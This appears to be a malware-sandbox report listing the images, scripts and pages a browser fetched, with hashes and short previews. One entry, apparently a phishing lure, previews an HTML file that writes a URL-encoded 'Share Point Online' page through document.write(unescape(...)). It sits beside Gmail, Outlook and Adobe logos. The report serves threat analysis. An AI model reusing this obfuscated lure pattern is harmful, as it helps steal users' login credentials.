                                                                                                Preview:.PNG........IHDR....................bKGD............ .IDATx......w}....%K.1.u.d0`..S.DU.$.]2.&.`.`..&.B&.o.........._vg.M&@+@.a.n.1.!3....lc.lu.....}...............Q..ReZ."Ay..................@/5...0.^.....MrO...&.=....jo.J...e...l...M.;..3.cO..T.}..s.I........@O.[.jfmnk.=InLr...k.6...;...y.I:..8...@O.....o..HrE.~.L.o%..|.y2'{.3.. ..8o.wf..\.o..-..2.QG..k.........2.Y0.."...r....v.[..$c+<.$.i..ck.+..++.........6i.L.s..).b.w....$...L./6......0......m.P....i......'..6.;>..Z.?..=...@....\..xv..i.A.T...X.b....c`..D......\nn..mrK.5.7..[.p.."..;|}>=...m.+..{V.M.5....."..y.3.r|U.X..4.`6.7...p4...8'j..~ ..F.s.v.xv-...!.x.M}.h.<.d_g".y..... .E ...6if&.c..&w&......."#M ......5...$...g..%y.M.......C...\...t?W.-+.v.Q.I.x.Lu..W.../j... ...T.+.....i..dm.M#.E..@..03..H.<.$.%yO.=.r.I.-..qk..&......q..=C.v.Q.l.|-.....o.g.. 8....O.[.jfmnk..+.1.E.7q^.Zd..D.>sx2...).d].=..[........n.....`.Q8.o7..n-.."@%/.K&......|6N...$..&{.&......=..&..VP.4G&.. ....;n-R.@
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 804 x 812, 8-bit/color RGBA, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):145460
                                                                                                Entropy (8bit):7.91082476776342
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:s8H1cSdYjM9YTf1/pwHAUubeZlKk77HzvS/m/I/vLDgMBqg7:sgmeU8hn577TvCm/eLDgeqg7
                                                                                                MD5:B2C9DDFEB2382910D7B21A0E2DEB5AC6
                                                                                                SHA1:BA78E292B1B3B46D012429F870708B3CADB4D97F
                                                                                                SHA-256:0F4A88EBE01D08A077968F010A3B82870DAC6434B8B9F5263853F1843A96CA52
                                                                                                SHA-512:A9C175154C9E9ADC91E0BC2E90741CED87D626C14C9C20E315DFD5D02CAF1E8F9519E72EB4C8C40357949C6123BA0B3F72C5FD6393F2F83F258D5D0B28BB293C
                                                                                                Malicious:false
                                                                                                URL:https://www.freepnglogos.com/uploads/red-email-mail-logo-png-8.png
                                                                                                Preview:.PNG........IHDR...$...,......Yfi....pHYs...#...#.x.?v....gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F..7.IDATx...1..... ..z.........'.;tL....0(.....$0....K.._............,....`......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$..b...Q0.F.(..`.L- ....1?.........a...lE.....R+.W..........k.r.....y..z b........ee.F#u...Q0..... ...*.Q0.F.(.....c.$..:..@,.f....m...I6...\..l..!E..N.v}..b...;@.G ..H?.wb@b....*+/.&.Q0.F.(... .F;$.`...Q0....Z.N..|F..A......@......r0>)..bgK.....Y...@6.c.......fl..;2......`...Q0@. .F;$.`...Q@O.`...T.b-hg.....2.!ATG..<.N..f... o...Y.r....|...B;,.%c...M.../..w...Q0.h...h.C2.F.(........a.B1.......h..q... F......|... ...U.D...~z......e..\./.kn.?..G.(....2..@...Q0.F.(..,^...a..A|..;..:...quV(.5!.cB
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):29151
                                                                                                Entropy (8bit):7.772740970984136
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:iaz6LC6D/5wqSdEQitTYu+00fmgeMWlUAKSGcmRaPL53hPHIWRCXsp/1m7HK:ihwqeuofmPMNlSGxR2L53hwVc/1sq
                                                                                                MD5:8E462B045122DD2AFFAC057A2F7939F7
                                                                                                SHA1:B71582DA872B0C2333821F4C1764BDB43B077AEF
                                                                                                SHA-256:6401F6A44EE6AE456AB040EC905C91BF7687303B0824DB5322576F82464E4FA3
                                                                                                SHA-512:405846D851042FB7E1B7406972FC129542FA586E9FDCA736FDA12EF4ED52863D14B1E0825A5724446EAFE3ED439AE7AA93DD316F23D959637450476D5B5350BD
                                                                                                Malicious:false
                                                                                                URL:https://www.freepnglogos.com/uploads/gmail-email-logo-png-12.png
                                                                                                Preview:.PNG........IHDR..............x....q.IDATx..}.xUe.u..H.c.....83......#........b.... :.J.$.N .J.........c........IH9e..>.z"........e.ii....a..'.."..p.......}.#.c.......k.[.;..(|G.Q....n..w......1V.7....q.=..G.^O.'.@ ..D.....Bs.....Q......Gc...qL.._.e....?+...x......U.......G.}.....G\H.........7......~.'..@ .N'....O.n_!|.S.% .*.D..?....w|..8...@...k..#t .#. .....b.;........'..@ ..._DhOx_.....;...|.?...3C...@ ..&...[...... W.P..........@ ..C...........I....g..o...@...k.y.^............xC....[..G..9.oA|@..V?#..\.7..@ .y....m.v..PE.3D?K.2@ ....~:..6........)....!..@...O.s.....$.$q.p.~.N..@ ..!._j?y....d...?.g..._..E ....~..}.Y0........Ux. ..D.I.W.6.g...q..X..c52..@T.....m.@".G..r.~..#..D...;.2.G...x...3..z..........[..>..=..._....@...k...7!....w.^X.#.....Yz..A.......;r.N......0.._...P!.W.3...A .n#.....Kq..@..T.K'.dA .N&~^...a..n..+6.w.K...........^....P...Z=.<..".........IE@.{.q.!..d.?...B.. ..."..E.(F ..'.n0...G...y*N*...O.Kx.7~.pEF..l#D ..%~.....=..:.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, Unicode text, UTF-8 text, with very long lines (23879)
                                                                                                Category:dropped
                                                                                                Size (bytes):206697
                                                                                                Entropy (8bit):5.25138789326818
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:K2N3ap6lpkzmZWOVSubvCPr5Q58J5JkA5jW5k95jG95h+5EZ5ud5uK5wc5wyJD5X:K2NqbOQNk5i+z/JE
                                                                                                MD5:693A64714CF9491CBFFF4266215407CB
                                                                                                SHA1:59675B4CB1219328EC1AEE13C77119A8D29BAF2B
                                                                                                SHA-256:88D868B061B4EB18E153A9D4AA6B060DC4A7F1D3DFFC1736A994E5B89DE75CEC
                                                                                                SHA-512:DD1BD0864D8672CAAE1EB15CC3A839D81D0F8431CC4D00C7CC946EA8AA129713B88E6A5F23FB4FB20CEE469CFBD408BFD6CE8F88511C23B88D40D9E5DA0072E5
                                                                                                Malicious:false
                                                                                                Preview:<!doctype html><html lang="de"><head><meta charset="UTF-8"><meta name="viewport" content="width=device-width, initial-scale=1"><link rel="profile" href="https://gmpg.org/xfn/11"><meta name='robots' content='index, follow, max-image-preview:large, max-snippet:-1, max-video-preview:-1' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> This site is optimized with the Yoast SEO plugin v24.1 - https://yoast.com/wordpress/plugins/seo/ --><title>publishing.blog - Wir bloggen, was wir selber lesen m.chten.</title><meta name="description" content="Wir bloggen, was wir selber lesen m.chten." /><link rel="canonical" href="https://publishing.blog/" /><link rel="next" href="https://publishing.blog/page/2/" /><meta property="og:locale" content="de_DE" /><meta property="og:type" content="website" /><meta property="og:title" content="publishing.blog" /><meta property="og:description" content="Wir bloggen, was wir selber lesen m.chten." /><
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 804 x 812, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):145460
                                                                                                Entropy (8bit):7.91082476776342
                                                                                                Encrypted:false
                                                                                                SSDEEP:3072:s8H1cSdYjM9YTf1/pwHAUubeZlKk77HzvS/m/I/vLDgMBqg7:sgmeU8hn577TvCm/eLDgeqg7
                                                                                                MD5:B2C9DDFEB2382910D7B21A0E2DEB5AC6
                                                                                                SHA1:BA78E292B1B3B46D012429F870708B3CADB4D97F
                                                                                                SHA-256:0F4A88EBE01D08A077968F010A3B82870DAC6434B8B9F5263853F1843A96CA52
                                                                                                SHA-512:A9C175154C9E9ADC91E0BC2E90741CED87D626C14C9C20E315DFD5D02CAF1E8F9519E72EB4C8C40357949C6123BA0B3F72C5FD6393F2F83F258D5D0B28BB293C
                                                                                                Malicious:false
                                                                                                Preview:.PNG........IHDR...$...,......Yfi....pHYs...#...#.x.?v....gAMA....|.Q.... cHRM..z%..............u0...`..:....o._.F..7.IDATx...1..... ..z.........'.;tL....0(.....$0....K.._............,....`......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$......... ..a.)......$..b...Q0.F.(..`.L- ....1?.........a...lE.....R+.W..........k.r.....y..z b........ee.F#u...Q0..... ...*.Q0.F.(.....c.$..:..@,.f....m...I6...\..l..!E..N.v}..b...;@.G ..H?.wb@b....*+/.&.Q0.F.(... .F;$.`...Q0....Z.N..|F..A......@......r0>)..bgK.....Y...@6.c.......fl..;2......`...Q0@. .F;$.`...Q@O.`...T.b-hg.....2.!ATG..<.N..f... o...Y.r....|...B;,.%c...M.../..w...Q0.h...h.C2.F.(........a.B1.......h..q... F......|... ...U.D...~z......e..\./.kn.?..G.(....2..@...Q0.F.(..,^...a..A|..;..:...quV(.5!.cB
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 512 x 512, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):29151
                                                                                                Entropy (8bit):7.772740970984136
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:iaz6LC6D/5wqSdEQitTYu+00fmgeMWlUAKSGcmRaPL53hPHIWRCXsp/1m7HK:ihwqeuofmPMNlSGxR2L53hwVc/1sq
                                                                                                MD5:8E462B045122DD2AFFAC057A2F7939F7
                                                                                                SHA1:B71582DA872B0C2333821F4C1764BDB43B077AEF
                                                                                                SHA-256:6401F6A44EE6AE456AB040EC905C91BF7687303B0824DB5322576F82464E4FA3
                                                                                                SHA-512:405846D851042FB7E1B7406972FC129542FA586E9FDCA736FDA12EF4ED52863D14B1E0825A5724446EAFE3ED439AE7AA93DD316F23D959637450476D5B5350BD
                                                                                                Malicious:false
                                                                                                Preview:.PNG........IHDR..............x....q.IDATx..}.xUe.u..H.c.....83......#........b.... :.J.$.N .J.........c........IH9e..>.z"........e.ii....a..'.."..p.......}.#.c.......k.[.;..(|G.Q....n..w......1V.7....q.=..G.^O.'.@ ..D.....Bs.....Q......Gc...qL.._.e....?+...x......U.......G.}.....G\H.........7......~.'..@ .N'....O.n_!|.S.% .*.D..?....w|..8...@...k..#t .#. .....b.;........'..@ ..._DhOx_.....;...|.?...3C...@ ..&...[...... W.P..........@ ..C...........I....g..o...@...k.y.^............xC....[..G..9.oA|@..V?#..\.7..@ .y....m.v..PE.3D?K.2@ ....~:..6........)....!..@...O.s.....$.$q.p.~.N..@ ..!._j?y....d...?.g..._..E ....~..}.Y0........Ux. ..D.I.W.6.g...q..X..c52..@T.....m.@".G..r.~..#..D...;.2.G...x...3..z..........[..>..=..._....@...k...7!....w.^X.#.....Yz..A.......;r.N......0.._...P!.W.3...A .n#.....Kq..@..T.K'.dA .N&~^...a..n..+6.w.K...........^....P...Z=.<..".........IE@.{.q.!..d.?...B.. ..."..E.(F ..'.n0...G...y*N*...O.Kx.7~.pEF..l#D ..%~.....=..:.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 648 x 768, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):12501
                                                                                                Entropy (8bit):7.592325213252809
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:04ZerIk+uUBbvU6TXLUoWm5o5DvCdr8wqQh+QnXOH7eNRzWURe82bCBbowtEsjeP:LIIk+59LUiK9oTPo7WwUKbCB9p+
                                                                                                MD5:9C57EFAE5855E24B41A221154543EDE0
                                                                                                SHA1:79D97CE5C00C1C6E0AE68782FEA73F9D9892DB3A
                                                                                                SHA-256:1B0E467247B9DAB100FF77807AF502E4277F72F721241C3F5B2EB483971AA9FA
                                                                                                SHA-512:8698EE90DE2E63A9B7D622855BA8234395C2D9E0BC6815FD1768A5F41D3215C53967229DAEF11EF48ABC7BFFAF4E6AA3D2172FF4FC6BC6F342335D30CF411483
                                                                                                Malicious:false
                                                                                                Preview:.PNG........IHDR....................bKGD............ .IDATx......w}....%K.1.u.d0`..S.DU.$.]2.&.`.`..&.B&.o.........._vg.M&@+@.a.n.1.!3....lc.lu.....}...............Q..ReZ."Ay..................@/5...0.^.....MrO...&.=....jo.J...e...l...M.;..3.cO..T.}..s.I........@O.[.jfmnk.=InLr...k.6...;...y.I:..8...@O.....o..HrE.~.L.o%..|.y2'{.3.. ..8o.wf..\.o..-..2.QG..k.........2.Y0.."...r....v.[..$c+<.$.i..ck.+..++.........6i.L.s..).b.w....$...L./6......0......m.P....i......'..6.;>..Z.?..=...@....\..xv..i.A.T...X.b....c`..D......\nn..mrK.5.7..[.p.."..;|}>=...m.+..{V.M.5....."..y.3.r|U.X..4.`6.7...p4...8'j..~ ..F.s.v.xv-...!.x.M}.h.<.d_g".y..... .E ...6if&.c..&w&......."#M ......5...$...g..%y.M.......C...\...t?W.-+.v.Q.I.x.Lu..W.../j... ...T.+.....i..dm.M#.E..@..03..H.<.$.%yO.=.r.I.-..qk..&......q..=C.v.Q.l.|-.....o.g.. 8....O.[.jfmnk..+.1.E.7q^.Zd..D.>sx2...).d].=..[........n.....`.Q8.o7..n-.."@%/.K&......|6N...$..&{.&......=..&..VP.4G&.. ....;n-R.@
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):10352
                                                                                                Entropy (8bit):7.926889629425954
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:uJmviaKu8DB78dXldWqTXnpA8PNU4aas35V2pdmgP5gL:Wlfl5qTXnpjNxg5V2dSL
                                                                                                MD5:B0C837095E949BC4D0B7B510295C9640
                                                                                                SHA1:13F50CA866250F7A26CBD2F921BBFD1B4BA6B4BF
                                                                                                SHA-256:C5B3FA89ED837F468E86C811D50F4200CFC9C18B0010AED01A6B399FD4065F00
                                                                                                SHA-512:CAB32B095B8B66A682BE3CE4844D503A9D778403DB6572E3AF3BF21BCF854B67615D047D490F0C6C8E1D48AFA6901D2A856E1D42E3E2B8827DE9262829F1F16D
                                                                                                Malicious:false
                                                                                                URL:https://help.lafayette.edu/wp-content/uploads/sites/451/2018/08/Apps-Adobe-Acrobat-Reader-Metro-icon.png
                                                                                                Preview:.PNG........IHDR.............\r.f..(7IDATx...|....?.fGd...D....U{.l......K)mu...RE.J..{..E.,..3D...........H..<..w......s.<...Cu.....A.$*...0]H...!. ..... L....0aH...!. ..... L....0aH...!. ..... L....0aH...!. ..... L....0aH...!. ..... L....0aH...!. ..... L....0aH...!. ..... L........c.v..o(.....7T*...,._.....pg.o.Kz(u...B..@....j.~..Zu..e.^G.......9l.. .v,..<..G.J.uBf..(..J...`..[..f{.3e...q...k.~...L......&}...A......./....1$...F..}V.uUO..w...........6.Ch........E...2..@.X.W...#..\Mky.........Z.U..h.~?..Z!?=.!.Z"..%..E........^8.j......ps.m......P[Z..}8?...".zh........P....Jk.FS........s....1..0b.+H:yD....C. s......t.g..~H.f..O.V.."..Ha.`...w....LA.."!!$.2.....:..gW.u.N.C.....Y..Up.3....i...R........(......1..=.....oSXM.U.....i...$$..@.T.4....,Z./...op..6.o.i~(xg..\.1Q.a..B. c...D@.f.....".[k...6..A."..E.Y.lA. c.......D..Y......]....QQ^J2N5.$.0..!..1.W.s[...[.....O/R.fv.hz$....8Q..((.z..D.....?v..M'.:..V...o..m.G...:L...*!.$.2.g..8.. Z.....7
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (65451)
                                                                                                Category:dropped
                                                                                                Size (bytes):89476
                                                                                                Entropy (8bit):5.2896589255084425
                                                                                                Encrypted:false
                                                                                                SSDEEP:1536:AjExXUqrnxDjoXEZxkMV4SYSt0zvDD6ip3h8cApwEjOPrBeU6QLiTFbc0QlQvakF:AYh8eip3huuf6IidlrvakdtQ47GK1
                                                                                                MD5:DC5E7F18C8D36AC1D3D4753A87C98D0A
                                                                                                SHA1:C8E1C8B386DC5B7A9184C763C88D19A346EB3342
                                                                                                SHA-256:F7F6A5894F1D19DDAD6FA392B2ECE2C5E578CBF7DA4EA805B6885EB6985B6E3D
                                                                                                SHA-512:6CB4F4426F559C06190DF97229C05A436820D21498350AC9F118A5625758435171418A022ED523BAE46E668F9F8EA871FEAB6AFF58AD2740B67A30F196D65516
                                                                                                Malicious:false
                                                                                                Preview:/*! jQuery v3.5.1 | (c) JS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(C,e){"use strict";var t=[],r=Object.getPrototypeOf,s=t.slice,g=t.flat?function(e){return t.flat.call(e)}:function(e){return t.concat.apply([],e)},u=t.push,i=t.indexOf,n={},o=n.toString,v=n.hasOwnProperty,a=v.toString,l=a.call(Object),y={},m=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType},x=function(e){return null!=e&&e===e.window},E=C.document,c={type:!0,src:!0,nonce:!0,noModule:!0};function b(e,t,n){var r,i,o=(n=n||E).createElement("script");if(o.text=e,t)for(r in c)(i=t[r]||t.getAttribute&&t.getAttribute(r))&&o.setAttribute(r,i);n.head.appendChild(o).parentNode.removeChild(o)}function w(e){return null==e?e+"":"o
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 1200 x 1178, 8-bit/color RGBA, non-interlaced
                                                                                                Category:downloaded
                                                                                                Size (bytes):41401
                                                                                                Entropy (8bit):7.728358268513985
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:Hi2sOJ0FH8Y1W19OwD3nDoOe/O9OnUbNe2t28T5:f21wnD47ie2881
                                                                                                MD5:642CA06DC84CDCB445FED93445E83F7D
                                                                                                SHA1:2EB609A73E521BA5F098980406BFD459CE1B8E80
                                                                                                SHA-256:033A8EE293E418973581B1E157CB5CC8873360D0EA5082A78DBBA3AACFB07A05
                                                                                                SHA-512:A89BF71171B458423A7D1C2DBAE56611AAB147F9DD54D702BFCFAD0BA8B77744C14FB48C2184E858BB159E5FF4B5C3A2362D12239D8DC5DBE5F7BAF4CFF6DC31
                                                                                                Malicious:false
                                                                                                URL:https://www.freepnglogos.com/uploads/microsoft-office-png-logo/microsoft-outlook-png-logo-1.png
                                                                                                Preview:.PNG........IHDR.............M.......bKGD............ .IDATx...w..u./..9S.I2.....HfB.X....?u...b[..Y..w........]W..u..6T.U......E.&.....L2s....%....~.9...Nf...N{....T..@s..e3...8...z..RY../...5................8..r.....J./..'.%I}~..{..*I.....I...P..]8:....V.K..I}IR.....I5.?....z+..-O......w^Gf.X.JuI...$.I.d(.>....*..'....h..\6#[.K.0..t..$....P`....^<&=]..V]....V..%....?...R`...);..K..........X...Xz.$.[..%.... I..?...(.........I.'1...P2.,..u......].zG..?......Z@...........$..@sS`.....ONm.A[.....[.8..Kb.....)...r:..Y..m.o..J.j..........hu.,..`;..[...?{........>'_2%.].n..[.T........(......._.?......)...]wz..5...R.L..%I..&..t.......X...........5..$...;I.........k..TkKR.v...!.....C....jG....N.b.....P`.@;8.i.nyf*...m.o..k.....S`.@+9..Q..t.v..[wUehBR.n.Oi..@.P`.@3.....?..Z.......W......[.5..'.n................0.7......mM......:2k..T.KR..%.O.$C........`{.,..N.dz*.C.3....$....`')....N..+.7/L=.S...T.'Y.d.$....`7(....8..Y..zG...%I./..'.[..*...... .,.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:HTML document, Unicode text, UTF-8 (with BOM) text, with very long lines (19623), with CRLF line terminators
                                                                                                Category:downloaded
                                                                                                Size (bytes):19660
                                                                                                Entropy (8bit):4.049942617070363
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:3ajgJbvGdsWbXDXpxXzaNfECq5TrZRbArkhIAvT:LpvVWbTZxON8Z5TrZRbAohzr
                                                                                                MD5:E32470AC49FB092A5D9A74DCE684BBEC
                                                                                                SHA1:6C65899383CBE89DD22603C5C3F20C38B8778539
                                                                                                SHA-256:65969D69201AA1C44B52FD6719305C2B92CF83B56B64EC7724DE7783DE18FE50
                                                                                                SHA-512:4124D97B8D4A582A0C6D32E7EC6CA986C04884F1DD1AC48DCD8A1DA6B5E46A1260FFC6C1B96F3E3B3676CC0FFF2AC31500306E1E7CC7BECEB9D978BF2C909F56
                                                                                                Malicious:false
                                                                                                URL:https://ucarecdn.com/0ea13331-baa4-4d0c-ad3b-b947ff0fe42a/
                                                                                                Preview:.<script>.. ..document.write(unescape("%0A%3C%21doctype%20html%3E%0A%3Chtml%20lang%3D%22en%22%3E%0A%3Chead%3E%0A%20%20%20%20%3Ctitle%3EShare%20Point%20Online%3C/title%3E%0A%20%20%20%20%3Cmeta%20charset%3D%22utf-8%22%3E%0A%20%20%20%20%3Cmeta%20name%3D%22viewport%22%20content%3D%22width%3Ddevice-width%2C%20initial-scale%3D1%22%3E%0A%20%20%20%20%3Clink%20rel%3D%22stylesheet%22%20href%3D%22https%3A//maxcdn.bootstrapcdn.com/bootstrap/4.5.2/css/bootstrap.min.css%22%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cscript%20src%3D%22https%3A//maxcdn.bootstrapcdn.com/bootstrap/4.5.2/js/bootstrap.min.js%22%3E%3C/script%3E%0A%20%20%20%20%3Cstyle%20type%3D%22text/css%22%3E%0A%20%20%20%20%20%20body%7B%0A%20%20%20%20%20%20%20%20font-size%3A%2014px%3B%0A%20%20%20%20%20%20%7D%0A
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (21084)
                                                                                                Category:downloaded
                                                                                                Size (bytes):21257
                                                                                                Entropy (8bit):5.218656398361519
                                                                                                Encrypted:false
                                                                                                SSDEEP:384:knMQG5rwVO7dV9nNbRGCB9D45Hkn5vj2xpOxvIAgD75zBi5vISg3gzopL9TidOg3:P5sg7X/jD45eSxpOxvKD73i5vTzwL9Ti
                                                                                                MD5:84415B7368FD6FC764CBE86039CE0626
                                                                                                SHA1:62F238E73348C77EB9E865426A7D1B7DE23CBB2D
                                                                                                SHA-256:C776195AD46333C6C9A9FE3C74502FFEA9A02FAF122388EA3567922CC65A3060
                                                                                                SHA-512:8423F7A626064813EA9D7CA974AC4A3D23B304717BE6853CC10F356BA3A21971C531E2ACF7FF0285B81897BA54BF02265C96F4DCDE1BB35A350F399BA2479E17
                                                                                                Malicious:false
                                                                                                URL:https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.16.0/umd/popper.min.js
                                                                                                Preview:/*. Copyright (C) Federico Zivolo 2019. Distributed under the MIT License (license terms are at http://opensource.org/licenses/MIT).. */(function(e,t){'object'==typeof exports&&'undefined'!=typeof module?module.exports=t():'function'==typeof define&&define.amd?define(t):e.Popper=t()})(this,function(){'use strict';function e(e){return e&&'[object Function]'==={}.toString.call(e)}function t(e,t){if(1!==e.nodeType)return[];var o=e.ownerDocument.defaultView,n=o.getComputedStyle(e,null);return t?n[t]:n}function o(e){return'HTML'===e.nodeName?e:e.parentNode||e.host}function n(e){if(!e)return document.body;switch(e.nodeName){case'HTML':case'BODY':return e.ownerDocument.body;case'#document':return e.body;}var i=t(e),r=i.overflow,p=i.overflowX,s=i.overflowY;return /(auto|scroll|overlay)/.test(r+s+p)?e:n(o(e))}function i(e){return e&&e.referenceNode?e.referenceNode:e}function r(e){return 11===e?re:10===e?pe:re||pe}function p(e){if(!e)return document.documentElement;for(var o=r(10)?document.body:
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):10352
                                                                                                Entropy (8bit):7.926889629425954
                                                                                                Encrypted:false
                                                                                                SSDEEP:192:uJmviaKu8DB78dXldWqTXnpA8PNU4aas35V2pdmgP5gL:Wlfl5qTXnpjNxg5V2dSL
                                                                                                MD5:B0C837095E949BC4D0B7B510295C9640
                                                                                                SHA1:13F50CA866250F7A26CBD2F921BBFD1B4BA6B4BF
                                                                                                SHA-256:C5B3FA89ED837F468E86C811D50F4200CFC9C18B0010AED01A6B399FD4065F00
                                                                                                SHA-512:CAB32B095B8B66A682BE3CE4844D503A9D778403DB6572E3AF3BF21BCF854B67615D047D490F0C6C8E1D48AFA6901D2A856E1D42E3E2B8827DE9262829F1F16D
                                                                                                Malicious:false
                                                                                                Preview:.PNG........IHDR.............\r.f..(7IDATx...|....?.fGd...D....U{.l......K)mu...RE.J..{..E.,..3D...........H..<..w......s.<...Cu.....A.$*...0]H...!. ..... L....0aH...!. ..... L....0aH...!. ..... L....0aH...!. ..... L....0aH...!. ..... L....0aH...!. ..... L....0aH...!. ..... L........c.v..o(.....7T*...,._.....pg.o.Kz(u...B..@....j.~..Zu..e.^G.......9l.. .v,..<..G.J.uBf..(..J...`..[..f{.3e...q...k.~...L......&}...A......./....1$...F..}V.uUO..w...........6.Ch........E...2..@.X.W...#..\Mky.........Z.U..h.~?..Z!?=.!.Z"..%..E........^8.j......ps.m......P[Z..}8?...".zh........P....Jk.FS........s....1..0b.+H:yD....C. s......t.g..~H.f..O.V.."..Ha.`...w....LA.."!!$.2.....:..gW.u.N.C.....Y..Up.3....i...R........(......1..=.....oSXM.U.....i...$$..@.T.4....,Z./...op..6.o.i~(xg..\.1Q.a..B. c...D@.f.....".[k...6..A."..E.Y.lA. c.......D..Y......]....QQ^J2N5.$.0..!..1.W.s[...[.....O/R.fv.hz$....8Q..((.z..D.....?v..M'.:..V...o..m.G...:L...*!.$.2.g..8.. Z.....7
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:PNG image data, 1200 x 1178, 8-bit/color RGBA, non-interlaced
                                                                                                Category:dropped
                                                                                                Size (bytes):41401
                                                                                                Entropy (8bit):7.728358268513985
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:Hi2sOJ0FH8Y1W19OwD3nDoOe/O9OnUbNe2t28T5:f21wnD47ie2881
                                                                                                MD5:642CA06DC84CDCB445FED93445E83F7D
                                                                                                SHA1:2EB609A73E521BA5F098980406BFD459CE1B8E80
                                                                                                SHA-256:033A8EE293E418973581B1E157CB5CC8873360D0EA5082A78DBBA3AACFB07A05
                                                                                                SHA-512:A89BF71171B458423A7D1C2DBAE56611AAB147F9DD54D702BFCFAD0BA8B77744C14FB48C2184E858BB159E5FF4B5C3A2362D12239D8DC5DBE5F7BAF4CFF6DC31
                                                                                                Malicious:false
                                                                                                Preview:.PNG........IHDR.............M.......bKGD............ .IDATx...w..u./..9S.I2.....HfB.X....?u...b[..Y..w........]W..u..6T.U......E.&.....L2s....%....~.9...Nf...N{....T..@s..e3...8...z..RY../...5................8..r.....J./..'.%I}~..{..*I.....I...P..]8:....V.K..I}IR.....I5.?....z+..-O......w^Gf.X.JuI...$.I.d(.>....*..'....h..\6#[.K.0..t..$....P`....^<&=]..V]....V..%....?...R`...);..K..........X...Xz.$.[..%.... I..?...(.........I.'1...P2.,..u......].zG..?......Z@...........$..@sS`.....ONm.A[.....[.8..Kb.....)...r:..Y..m.o..J.j..........hu.,..`;..[...?{........>'_2%.].n..[.T........(......._.?......)...]wz..5...R.L..%I..&..t.......X...........5..$...;I.........k..TkKR.v...!.....C....jG....N.b.....P`.@;8.i.nyf*...m.o..k.....S`.@+9..Q..t.v..[wUehBR.n.Oi..@.P`.@3.....?..Z.......W......[.5..'.n................0.7......mM......:2k..T.KR..%.O.$C........`{.,..N.dz*.C.3....$....`')....N..+.7/L=.S...T.'Y.d.$....`7(....8..Y..zG...%I./..'.[..*...... .,.
                                                                                                Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                File Type:ASCII text, with very long lines (59765)
                                                                                                Category:dropped
                                                                                                Size (bytes):60044
                                                                                                Entropy (8bit):5.145139926823033
                                                                                                Encrypted:false
                                                                                                SSDEEP:768:wfAnnayQIk8HVheIE8Dg76TXQI4vPKMEK6viTlCDFm4n6xOp6Pxg3/wCVaAk2:wfUnTcWCw6xJxg7aAz
                                                                                                MD5:02D223393E00C273EFDCB1ADE8F4F8B1
                                                                                                SHA1:0CC93B8421D89C24A889642428B363CB831DE78A
                                                                                                SHA-256:79C599DD760CEC0C1621A1AF49D9A2A49DA5D45E1B37D4575BACE0A5E0226582
                                                                                                SHA-512:339296DF3B6E2080A65488634AA5DED35A15D9BA5EDB8F203B1AA695C62B13302FC2CECFC37CFA04AD2219BAF0BDDAD4414862DDE5E0B71A7923C3C3A3D61F8D
                                                                                                Malicious:false
